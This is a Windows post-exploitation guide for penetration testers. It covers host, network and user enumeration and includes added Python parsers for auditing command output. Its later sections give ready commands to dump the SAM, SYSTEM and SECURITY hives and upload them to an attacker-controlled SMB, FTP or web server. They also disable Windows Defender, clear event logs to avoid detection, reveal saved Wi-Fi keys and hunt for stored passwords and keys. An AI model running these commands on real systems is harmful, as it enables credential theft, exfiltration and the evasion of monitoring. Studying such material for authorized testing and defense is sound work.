Windows Awareness Checks

windowsAwareness-chacho

Introduction

When a penetration tester gains access to a Windows target, the primary goal is to gather as much information as possible about the environment. This includes performing various awareness checks to identify potential security risks, understand the current security posture, and gather intelligence for privilege escalation or further exploitation. This guide outlines a series of checks, grouped by categories, that should be performed immediately after gaining access to a Windows system.

System Information and Security Policies

Check System Information

Gather detailed information about the system, including the operating system version, architecture, and installed patches. This information is crucial for understanding the environment and identifying potential vulnerabilities.

systeminfo

Review Security Policies

Audit local security policies to understand password policies, user rights assignments, and audit policies, which can provide insights into the security posture of the system.

secedit /export /cfg C:\securitypolicy.cfg
or
gpresult /z > C:\grouppolicy.txt

Check Windows Defender Status

Determine the status of Windows Defender, including real-time protection, malware signature versions, and last scan times.

powershell -Command "Get-MpComputerStatus"

Check PowerShell Execution Policy

Identify the PowerShell execution policy, which can indicate security settings or restrictions that might affect script execution.

powershell -Command "Get-ExecutionPolicy -List"

Check System Uptime

Knowing how long the system has been running gives context on how recently it was rebooted and therefore how fresh any patching or configuration change is. The "Statistics since" line in the output shows when the Server service started, which normally coincides with the last boot.

net stats srv

Identify Logged-In Remote Users

Determine if there are any active remote sessions on the machine, which could indicate ongoing legitimate or unauthorized access.

qwinsta

Process and Service Awareness

Check Integrity Level of a Process

Understanding the integrity level of a process is crucial for assessing potential privilege escalation opportunities.

  1. Retrieve detailed information about a process:

    wmic process where processid=<ProcessID> get ExecutablePath,Name,ProcessId,OSName,Handle,ParentProcessId,Caption,CommandLine /FORMAT:LIST
    

  2. Check the integrity level and other security mitigations:

    powershell -Command "(Get-Process -Id <ProcessID>).Path; (Get-Process -Id <ProcessID> | Get-ProcessMitigation).Process.MandatoryASLR"
    

List Running Processes

Identify all running processes, which helps in spotting potential targets for privilege escalation as well as malicious processes.

tasklist

For a verbose view that adds the owning user name, session, status and window title of each process:

tasklist /v

List and Check Services

Services running on the system could provide potential privilege escalation opportunities, especially if they are misconfigured.

  1. List all services:

    sc query state= all
    
    or
    wmic service list brief
    

  2. Check auto-start services and their configurations:

    wmic service where "startmode='Auto'" get DisplayName,PathName,StartMode
    

Enumerate Scheduled Tasks

Scheduled tasks can be used for persistence or as part of an attack vector.

schtasks /query /fo LIST /v

Network Awareness and Configuration

Network Awareness Checks

Understanding the network configuration and active connections on the target system is essential.

  1. Display all active connections and listening ports:

    netstat -a
    

  2. Display the executable associated with each connection or listening port:

    netstat -b
    

  3. Display Ethernet statistics (e.g., bytes sent and received):

    netstat -e
    

  4. Display the routing table:

    netstat -r
    

  5. Display all connections, listening ports, and associated process IDs (PIDs):

    netstat -ano
    

  6. Refresh the displayed network information every specified interval (in seconds):

    netstat -an 5
    

Filtering Network Information

To narrow down the network information to specific criteria, such as connections on a particular port, use the findstr command. Note that findstr performs a plain substring match: ":80" also matches ports such as 8080 and 800, and it matches the Foreign Address column as well, so check the Local Address column of each hit.

netstat -ano | findstr :80
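
As an added example that is not part of the original page, the following Python script parses captured netstat -ano output offline and filters it by exact local port, and goes one step further by mapping every listening port to the PIDs bound to it so the result can be cross-checked against tasklist. The sample output embedded in it is constructed, not taken from a real host. The point it makes is that findstr :80 matches any line containing the text ":80", so 8080 also shows up, while a parsed port number can be compared exactly.

```python
# Constructed sample in the layout that `netstat -ano` prints; not captured from a real host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1234
  TCP    10.0.0.5:49700         10.0.0.9:445           ESTABLISHED     912
  TCP    [::]:80                [::]:0                 LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1180
"""


def split_host_port(addr):
    """Split 'host:port' or '[v6]:port' at the last colon; '*:*' has no numeric port."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn netstat -ano output into dicts; keeps the raw line for findstr comparisons."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, blank and header lines
        proto, local, foreign = parts[0], parts[1], parts[2]
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
        else:
            state, pid = "", int(parts[3])  # UDP rows have no State column
        host, port = split_host_port(local)
        rows.append({"proto": proto, "local_host": host, "local_port": port,
                     "foreign": foreign, "state": state, "pid": pid, "raw": line})
    return rows


def listening_on_port(rows, port):
    """Exact match on the parsed local port, restricted to listening sockets."""
    return [r for r in rows if r["local_port"] == port and r["state"] == "LISTENING"]


def findstr_style_matches(rows, port):
    """What `findstr :<port>` returns: every line containing that text anywhere."""
    needle = ":%d" % port
    return [r for r in rows if needle in r["raw"]]


def pids_by_listening_port(rows):
    """Map each listening port to the PIDs bound to it, for cross-checking against tasklist."""
    result = {}
    for r in rows:
        if r["state"] == "LISTENING":
            result.setdefault(r["local_port"], set()).add(r["pid"])
    return result


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("exact port 80:", [(r["local_host"], r["pid"]) for r in listening_on_port(rows, 80)])
    print("findstr :80  :", [r["local_host"] + ":" + str(r["local_port"])
                             for r in findstr_style_matches(rows, 80)])
    print("listeners    :", pids_by_listening_port(rows))
```

On the constructed sample, the exact filter returns the two port-80 listeners (IPv4 and IPv6, both PID 4) while the findstr-style filter also returns the 8080 listener.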

Network Interface Details

Gather detailed information about the network interfaces, including IP addresses, DNS settings, and network card details.

  1. View network configuration details:

    ipconfig /all
    

  2. Get detailed information about network adapters:

    wmic nic get Name, MACAddress, Manufacturer, NetConnectionStatus, Speed
    

List Open Shares

Enumerating open network shares can reveal shared resources that might be accessible, which can be useful for lateral movement.

net view \\<hostname>
net share

ARP Cache Inspection

Inspecting the ARP cache can provide insights into other devices on the network that the target machine has communicated with.

arp -a

DNS Cache Inspection

Reviewing the DNS cache can provide information about previously resolved domain names, which could reveal internal services or systems.

ipconfig /displaydns

User and Session Information

Enumerate Users and Session Details

Understanding who has access to the system and who is currently logged in can help identify potential accounts to target or sessions to hijack.

  1. List directories under C:\Users to identify user profiles:

    dir C:\Users
    

  2. Find Security Identifiers (SIDs) for users on the host:

    wmic useraccount get name,sid
    
    or
    reg query HKU
    

  3. Enumerate domain users:

    net user /domain
    

  4. Check who is currently logged in:

    query user
    

Host and Environment Information

Gather basic system information, such as the hostname, NetBIOS name, and environment variables, to provide context about the target and assist in crafting further attacks.

  1. Get the hostname:

    hostname
    
    or
    echo %COMPUTERNAME%
    

  2. Get the NetBIOS name:

    nbtstat -a <hostname>
    

  3. Check environment variables:

    cmd /c set
    

Privilege Escalation Checks

Enumerate Local Administrators

Identifying which users have local administrative privileges is crucial, as it can help identify potential targets for privilege escalation.

net localgroup Administrators

Check for Unquoted Service Paths

Unquoted service paths can be exploited for privilege escalation, especially if the service is running with elevated privileges.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
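
The following Python audit script is added here and is not part of the original page. It implements the same check as the one-liner above, but over captured wmic service get name,pathname,startmode /format:list output (the blank-line separated Key=Value layout is assumed from that format; the service records are constructed, not from a real host). It flags auto-start services whose executable path is unquoted and contains a space outside C:\Windows, and returns the quoted form the path should have, which is the remediation.

```python
# Constructed records in the Key=Value layout of `wmic service get name,pathname,startmode /format:list`
# (records separated by blank lines); not taken from a real host.
SAMPLE_WMIC_LIST = r"""

Name=ExBackup
PathName=C:\Program Files\Example Corp\Backup Agent\agent.exe -svc
StartMode=Auto


Name=GoodSvc
PathName="C:\Program Files\Example Corp\good.exe" /run
StartMode=Auto


Name=Spooler
PathName=C:\Windows\System32\spoolsv.exe
StartMode=Auto


Name=ManualSvc
PathName=C:\Tools\my agent.exe
StartMode=Manual
"""

WINDOWS_DIR = "c:\\windows\\"  # same exclusion the findstr one-liner applies


def parse_wmic_list(text):
    """Blank-line separated Key=Value records -> list of dicts."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        records.append(current)
    return records


def executable_part(pathname):
    """The portion up to and including '.exe'; without '.exe', the first token."""
    idx = pathname.lower().find(".exe")
    if idx != -1:
        return pathname[: idx + 4]
    return pathname.split(" ", 1)[0]


def unquoted_path_issue(record):
    """Return the quoted form the path should have, or None if the service is not affected."""
    path = record.get("PathName", "").strip()
    if not path or path.startswith('"'):
        return None  # already quoted: one unambiguous executable token
    exe = executable_part(path)
    if " " not in exe:
        return None  # no space before the .exe, nothing for the loader to misparse
    if exe.lower().startswith(WINDOWS_DIR):
        return None  # system directory, not writable by standard users
    return '"%s"%s' % (exe, path[len(exe):])


def audit_services(text, auto_only=True):
    """(name, current path, suggested quoted path) for each affected service."""
    findings = []
    for rec in parse_wmic_list(text):
        if auto_only and rec.get("StartMode", "").lower() != "auto":
            continue
        fix = unquoted_path_issue(rec)
        if fix:
            findings.append((rec.get("Name", "?"), rec["PathName"], fix))
    return findings


if __name__ == "__main__":
    for name, path, fix in audit_services(SAMPLE_WMIC_LIST, auto_only=False):
        print("%-10s %s\n           -> %s" % (name, path, fix))
```

With auto_only left at its default the script reports only ExBackup, matching the findstr "Auto" filter; with auto_only=False it also reports ManualSvc, whose space sits in the file name itself rather than a directory, which is equally affected. Fixing a finding means setting the quoted path on the service (sc config <name> binPath= ...) and confirming that standard users cannot write to any directory along the path.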

Check for AlwaysInstallElevated

If the "AlwaysInstallElevated" policy is enabled, it allows users to install .msi files with elevated privileges, which could be exploited. The policy only takes effect when the value is set to 1 under both HKLM and HKCU, so check both keys.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

File System and Data Access

Search for Passwords in Configuration Files

Certain applications or scripts might store plaintext passwords in configuration files. Searching for common keywords related to credentials could reveal sensitive information.

findstr /si password *.xml *.ini *.txt

Look for SSH Keys

SSH keys can provide access to other systems or services. Searching the filesystem for key files is a good practice.

dir /s /b *id_rsa*

Find .ppk Files

Search for sensitive files, such as PuTTY private key files (.ppk), which can uncover valuable credentials or configuration details.

dir /s /b *.ppk

Display Contents of Interesting Files

If you find files that might contain sensitive information, such as text files, use the following command to display their contents:

type file1.txt file2.txt

Find Sessions Associated with a .ppk File

If PuTTY sessions exist on the target, identifying associated .ppk files can lead to discovering SSH keys used for remote access.

  1. List all SIDs in the HKU hive:

    reg query HKU
    

  2. Check each SID for PuTTY sessions:

    reg query "HKU\SID\Software\SimonTatham\PuTTY\Sessions"
    

  3. Inspect each session for the .ppk file path:

    reg query "HKU\SID\Software\SimonTatham\PuTTY\Sessions\SessionName" /v PublicKeyFile
    

Alternatively, use a batch script to automate the search for .ppk file paths across all PuTTY sessions on the system:

@echo off
setlocal enabledelayedexpansion

rem Walk every loaded user hive under HKU and report PuTTY sessions that reference a key file.
for /f "tokens=*" %%i in ('reg query HKU') do (
    set "sid=%%i"
    if "!sid:~0,4!"=="HKEY" (
        echo Checking SID: !sid!
        rem the caret keeps the stderr redirect inside the for command string
        for /f "tokens=*" %%j in ('reg query "!sid!\Software\SimonTatham\PuTTY\Sessions" 2^>nul') do (
            set "session=%%j"
            if "!session:~0,4!"=="HKEY" (
                echo Checking session: !session!
                reg query "!session!" /v PublicKeyFile 2>nul | find /i "PublicKeyFile" >nul
                if !errorlevel! equ 0 (
                    echo PPK file found in session: !session!
                    reg query "!session!" /v PublicKeyFile
                )
            )
        )
    )
)

endlocal

Persistence Mechanisms

Check for Startup Items

Malware or backdoors often add themselves to startup items to persist through reboots. Identifying these items can reveal persistence mechanisms.

wmic startup get caption,command

Check for Scheduled Tasks

While scheduled tasks were previously mentioned, focusing specifically on those set to execute with elevated privileges or at system boot can highlight persistence mechanisms. Note that the filter below matches any line containing "system", including paths under C:\Windows\System32 and "At system start up" schedules, so review the "Task To Run" and "Run As User" lines of each matching task rather than the matched line alone.

schtasks /query /fo LIST /v | findstr /i "system"
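
As an added example that is not from the original page, this Python script parses schtasks /query /fo LIST /v output that was captured to a file and selects tasks that run as a system account but launch a command outside C:\Windows, which is a far tighter filter than findstr /i "system". The field names HostName, TaskName, Task To Run and Run As User are those schtasks prints; the task records themselves are constructed, not from a real host.

```python
# Constructed records in the layout of `schtasks /query /fo LIST /v` (field names as schtasks prints
# them; only a subset of fields kept); not captured from a real host.
SAMPLE_SCHTASKS = r"""
Folder: \
HostName:                             WS01
TaskName:                             \Updater
Next Run Time:                        N/A
Status:                               Ready
Last Run Time:                        1/2/2024 9:00:00 AM
Author:                               WS01\bob
Task To Run:                          C:\Users\Public\update.exe /silent
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        At system start up

Folder: \Microsoft\Windows\Defrag
HostName:                             WS01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Task To Run:                          %windir%\system32\defrag.exe -c -h -g
Run As User:                          SYSTEM
Schedule Type:                        Weekly

Folder: \
HostName:                             WS01
TaskName:                             \BobBackup
Task To Run:                          C:\Users\bob\backup.cmd
Run As User:                          WS01\bob
Schedule Type:                        Daily
"""

SYSTEM_ACCOUNTS = {"system", "nt authority\\system", "local service", "network service"}


def parse_schtasks_list(text):
    """Each task record starts at its HostName: line; 'Key: value' is split at the first colon."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("Folder:"):
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "HostName" and current:
            tasks.append(current)
            current = {}
        current[key] = value
    if current:
        tasks.append(current)
    return tasks


def normalize_command(cmd):
    """Lower-case, strip surrounding quotes and expand the two usual system-directory variables."""
    cmd = cmd.strip().strip('"').lower()
    for var in ("%windir%", "%systemroot%"):
        cmd = cmd.replace(var, "c:\\windows")
    return cmd


def elevated_tasks_outside_windows(tasks):
    """Task names that run as a system account but launch a command outside C:\\Windows."""
    hits = []
    for t in tasks:
        user = t.get("Run As User", "").lower()
        cmd = normalize_command(t.get("Task To Run", ""))
        if user in SYSTEM_ACCOUNTS and cmd and not cmd.startswith("c:\\windows\\"):
            hits.append(t.get("TaskName", "?"))
    return hits


def findstr_system_lines(text):
    """What `findstr /i "system"` returns: every line containing 'system', whatever the field."""
    return [line for line in text.splitlines() if "system" in line.lower()]


if __name__ == "__main__":
    tasks = parse_schtasks_list(SAMPLE_SCHTASKS)
    print("review these tasks:", elevated_tasks_outside_windows(tasks))
    print("lines findstr would return:", len(findstr_system_lines(SAMPLE_SCHTASKS)))
```

On the constructed records only \Updater is reported, whereas findstr returns four lines, two of them from the built-in defrag task, and none of them identifies which task the line belongs to.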

Advanced Network Enumeration

Wireless Network Information

If the target is a laptop or a system that connects to wireless networks, enumerating stored wireless profiles can reveal saved credentials and network information.

  1. Enumerate Wireless Profiles:

    netsh wlan show profiles
    

  2. Dump Wireless Network Keys:

    netsh wlan show profile name="<ProfileName>" key=clear
    

Security and Registry Checks

What AntiVirus is Running

Identify what antivirus software is running on the target system, which could potentially interfere with your activities.

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /format:list

Dump and Transfer Specific Registry Hives

Extracting specific registry hives can provide access to sensitive information, such as user credentials and system configurations. The following steps will guide you through dumping these hives and securely transferring them off the target system.

  1. Dump Specific Registry Hives: Save the SAM, SYSTEM, and SECURITY hives to files on the target system.

    reg save HKLM\SAM C:\Windows\Temp\sam.save
    reg save HKLM\SYSTEM C:\Windows\Temp\system.save
    reg save HKLM\SECURITY C:\Windows\Temp\security.save
    

  2. Transfer the Dumped Hives Off the Target: After saving the hives, transfer them to a remote location where you can analyze them securely. Here are a few methods you can use:

     Using SMB:

    copy C:\Windows\Temp\sam.save \\<your-smb-server>\share\sam.save
    copy C:\Windows\Temp\system.save \\<your-smb-server>\share\system.save
    copy C:\Windows\Temp\security.save \\<your-smb-server>\share\security.save
    

     Using FTP:

    ftp <ftp-server-address>
    put C:\Windows\Temp\sam.save
    put C:\Windows\Temp\system.save
    put C:\Windows\Temp\security.save
    

     Using PowerShell to upload to a web server:

    $WebClient = New-Object System.Net.WebClient
    $WebClient.UploadFile("http://<your-web-server>/upload/sam.save", "C:\Windows\Temp\sam.save")
    $WebClient.UploadFile("http://<your-web-server>/upload/system.save", "C:\Windows\Temp\system.save")
    $WebClient.UploadFile("http://<your-web-server>/upload/security.save", "C:\Windows\Temp\security.save")
    

  3. Clean Up: After transferring the files, delete the saved registry hives from the target system to avoid leaving traces.

    del C:\Windows\Temp\sam.save
    del C:\Windows\Temp\system.save
    del C:\Windows\Temp\security.save
    

Review Event Logs

Check event logs for suspicious activities, such as failed logons, service failures, or security events.

wevtutil qe Security /rd:true /f:text /c:10
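
Added example, not part of the original page: a Python parser for the text layout that wevtutil qe Security /f:text produces, run over three constructed events (not from a real host). It counts failed logons (Event ID 4625) per source address and account, lists source addresses that exceed a threshold, and lists Security log clears (Event ID 1102, the record Windows writes when the audit log is cleared), so the same captured output serves both the failed-logon review and a log-tampering check.

```python
# Three constructed events in the text layout of `wevtutil qe Security /f:text`; not from a real host.
SAMPLE_WEVTUTIL = """\
Event[0]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: 2024-01-02T09:00:01.000
  Event ID: 4625
  Keyword: Audit Failure
  Description:
An account failed to log on.
Subject:
\tAccount Name:\t\t-
Account For Which Logon Failed:
\tAccount Name:\t\tadministrator
Network Information:
\tSource Network Address:\t10.0.0.77

Event[1]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: 2024-01-02T09:00:02.000
  Event ID: 4625
  Keyword: Audit Failure
  Description:
An account failed to log on.
Subject:
\tAccount Name:\t\t-
Account For Which Logon Failed:
\tAccount Name:\t\tbob
Network Information:
\tSource Network Address:\t10.0.0.77

Event[2]:
  Log Name: Security
  Source: Microsoft-Windows-Eventlog
  Date: 2024-01-02T09:30:00.000
  Event ID: 1102
  Keyword: Audit Success
  Description:
The audit log was cleared.
"""


def parse_wevtutil_text(text):
    """Split the output into events: two-space-indented header fields, then the description body."""
    events, current, in_body = [], None, False
    for line in text.splitlines():
        if line.startswith("Event["):
            current, in_body = {"body": []}, False
            events.append(current)
        elif current is None:
            continue
        elif in_body:
            current["body"].append(line)
        elif line.startswith("  "):
            key, _, value = line.strip().partition(":")
            current[key] = value.strip()
            if key == "Description":
                in_body = True  # everything up to the next Event[ belongs to the description
    return events


def body_field(event, label):
    """Last occurrence wins: in 4625 the Subject block precedes the failed account's block."""
    value = None
    for line in event["body"]:
        key, sep, val = line.strip().partition(":")
        if sep and key == label:
            value = val.strip()
    return value


def failed_logons(events):
    """Count Event ID 4625 per (source address, account name)."""
    counts = {}
    for e in events:
        if e.get("Event ID") == "4625":
            key = (body_field(e, "Source Network Address"), body_field(e, "Account Name"))
            counts[key] = counts.get(key, 0) + 1
    return counts


def noisy_sources(events, threshold):
    """Source addresses with at least `threshold` failed logons across all accounts."""
    per_source = {}
    for (src, _), n in failed_logons(events).items():
        per_source[src] = per_source.get(src, 0) + n
    return sorted(s for s, n in per_source.items() if n >= threshold)


def log_clears(events):
    """Dates of Event ID 1102, the Security log's record that the audit log was cleared."""
    return [e.get("Date") for e in events if e.get("Event ID") == "1102"]


if __name__ == "__main__":
    events = parse_wevtutil_text(SAMPLE_WEVTUTIL)
    print("failed logons:", failed_logons(events))
    print("sources with 2+ failures:", noisy_sources(events, 2))
    print("log cleared at:", log_clears(events))
```

Raise the /c: count on the wevtutil command to capture enough history for the threshold to be meaningful; the parser does not care how many events follow.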

Kernel Debugging

Check if kernel debugging is enabled, as this can indicate a vulnerable state or debugging left on after testing.

bcdedit /dbgsettings

Anti-Malware Evasion

Disable Windows Defender (If Needed)

In certain situations, disabling Windows Defender may be necessary to execute certain actions or tools without detection.

Set-MpPreference -DisableRealtimeMonitoring $true

Cleaning Up Traces

Clear Event Logs

After completing actions on the system, it’s often necessary to clear event logs to avoid detection.

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

Active Directory (if applicable)

Enumerate Domain Controllers and Trusts

If the target system is part of a domain, gathering information about domain controllers and trusts is critical.

nltest /dclist:<domain>
or
nltest /trusted_domains

Gather Group Policy Information

Determine which Group Policies are applied and their settings.

gpresult /r /scope computer

Memory and Credentials

Dump LSA Secrets

Dumping LSA secrets can reveal cached credentials and other sensitive information stored by the Local Security Authority.

reg save HKLM\SYSTEM C:\Windows\Temp\system.save
reg save HKLM\SECURITY C:\Windows\Temp\security.save
Then, transfer these hives off the system for further analysis using a tool like Mimikatz to extract the secrets.

Dumping SAM Database

In addition to the registry hives, dumping the SAM database can directly provide user hashes that can be cracked offline.

reg save HKLM\SAM C:\Windows\Temp\sam.save

Clipboard Content

Capture Clipboard Data

The clipboard may contain sensitive information, such as passwords or commands copied by the user.

powershell -Command "Get-Clipboard"
